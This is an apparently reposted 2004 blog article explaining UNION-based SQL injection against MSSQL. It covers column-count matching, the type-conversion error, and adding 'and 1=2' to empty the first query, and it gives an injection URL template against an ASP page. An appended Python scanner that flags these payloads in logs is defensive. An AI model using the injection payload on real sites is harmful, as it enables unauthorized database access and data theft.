Union Select In MSSQL



Text: Security Angel · Superhei [BST], 2004-11-05

UNION queries opened up a whole new world for SQL injection: in MySQL and Access they are extremely useful, so what about MSSQL? I actually started testing UNION in MSSQL quite early, but I made a big mistake: I assumed that UNION in MSSQL would always be blocked by the "data type conversion error" and so could not be used to substitute the query output. I was wrong. Thanks to xiaolu for the reminder, THX.

Background

The columns of the table master.dbo.spt_values are as follows:

name (nvarchar(35), null)

number (int, not null)

type (nchar(3), not null)

low (int, null)

high (int, null)

status (int, null)

We run the query:

select type from dbo.spt_values where name = 'rpc';

which returns:

type

A

Now query:

select type from dbo.spt_values where name = 'rpc' union select 111;

which returns:

Server: Msg 245, Level 16, State 1, Line 1

Syntax error converting the nvarchar value 'A' to a column of data type int.

See it? This is the "data type conversion error", and I only just understood it :( Look at the statement: select type from dbo.spt_values where name = 'rpc'. Because a row with name = 'rpc' exists, the first query returns a value of type nchar, while the select 111 after the UNION is of data type int, so the UNION query fails with the error above.

What happens if the SELECT in front of our UNION matches no record at all?

We run the query:

select type from dbo.spt_values where name = 'rpcssdfsdfsdfds' union select 111;

or:

select type from dbo.spt_values where name = 'rpc' and 1 = 2 union select 111;

In the statement above, name = 'rpcssdfsdfsdfds' does not exist at all, so there is no error and the result is returned successfully:

type

111

Let's test another statement: select type, name from dbo.spt_values where name = 'rpc' union select 111; (the query before the UNION outputs two fields, type and name)

We get an error:

Server: Msg 205, Level 16, State 1, Line 1

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

Haha ~~ Everyone should be very familiar with this one: the number of fields before and after the UNION does not match. So we change the statement to:

select type, name from dbo.spt_values where name = 'rpc' union select 111, 111; (two fields on both sides of the UNION) and it succeeds:

type name

111 111

A similar statement:

select * from dbo.spt_values where name = 'rpc' union select 1, 1, 1, 1, 1, 1;

Because the table spt_values has 6 fields, the SELECT after the UNION must also have 6 fields.

Actually, this point was already covered in my article on UNION queries in MySQL injection; I am just bringing it up again.

Summary:

For a statement SELECT A UNION SELECT B (A and B against different tables):

1. The UNION query requires that the number of fields in A equals the number of fields in B.

2. In a UNION query in MSSQL, if query A returns data, MSSQL does not simply output A's rows in front of B's as MySQL does; instead it fails with the error "Syntax error converting the nvarchar value 'A' to a column of data type int."

In fact, in an injection our aim is to obtain the result of statement B, so when using a UNION query to substitute the output we must make sure the result of statement A is empty. This is the same whether the database is MySQL, Access or MSSQL.

So we add an "and 1 = 2" after the injected id:

http://www.xxx.net/videoplay.asp?VideoID=1995 and 1=2 union select 1,1,1,1......... This form is the same as using UNION in MySQL and Access, so if we construct the statement carefully, one injection statement can work against Access, MySQL > 4.0, MSSQL, or indeed any database that supports UNION.
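The detection side of what this article describes, as an added example that is not part of the original article: a small Python scanner over constructed IIS-style log lines (the paths, parameter names and lines are made up for the example) that flags the "and 1=2 union select 1,1,1,1" form, counts how many columns the request is probing for, and recognises the MSSQL error 205/245 text when it leaks into a response body.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (method, path, query string, status); not from the article.
SAMPLE_LOG = """\
GET /videoplay.asp VideoID=1995 200
GET /videoplay.asp VideoID=1995+and+1%3D2+union+select+1,1,1,1 500
GET /videoplay.asp VideoID=1995+union+select+111 500
GET /videoplay.asp VideoID=1995+and+1%3D1 200
GET /search.asp q=union+station 200
"""

# "union [all] select" in the decoded query string is the substitution pattern the article describes.
UNION_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
# "and 1=2" empties the first SELECT so MSSQL does not raise the conversion error (Msg 245).
FALSE_COND_RE = re.compile(r"\band\s+1\s*=\s*2\b", re.I)
# Msg 205 (column count mismatch) or Msg 245 (type conversion) leaking to the client.
MSSQL_ERR_RE = re.compile(r"\b(?:Msg|Message)\s+(205|245)\b")


def classify_query(qs):
    """Decode one query string and report the UNION-injection indicators it carries."""
    decoded = unquote_plus(qs)
    m = UNION_RE.search(decoded)
    cols = None
    if m:
        # Count the expressions in the injected select list ("1,1,1,1" is a column-count probe).
        tail = decoded[m.end():].split(" from ")[0].split("--")[0]
        cols = len([c for c in tail.split(",") if c.strip()])
    return {"union": bool(m),
            "false_condition": bool(FALSE_COND_RE.search(decoded)),
            "columns": cols}


def scan_log(text):
    """Return one finding per log line whose query string carries a UNION SELECT payload."""
    findings = []
    for line in text.splitlines():
        method, path, qs, status = line.split()
        info = classify_query(qs)
        if info["union"]:
            findings.append({"path": path, "status": int(status), **info})
    return findings


def response_leaks_union_error(body):
    """Return 205 or 245 when the MSSQL UNION error text appears in a response body, else None."""
    m = MSSQL_ERR_RE.search(body)
    return int(m.group(1)) if m else None
```

A 500 status paired with a UNION payload, or a leaked Msg 205/245 in the body, is the probing phase the article walks through; suppressing detailed database errors removes the feedback the column-count probe relies on.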

So the writing of our injection tools can make a fresh start. Fortunately, Casi, which I was already using in actual testing, can now inject Access, MSSQL and MySQL alike, as shown below:

Please credit the original source when reposting: https://www.9cbs.com/read-74276.html
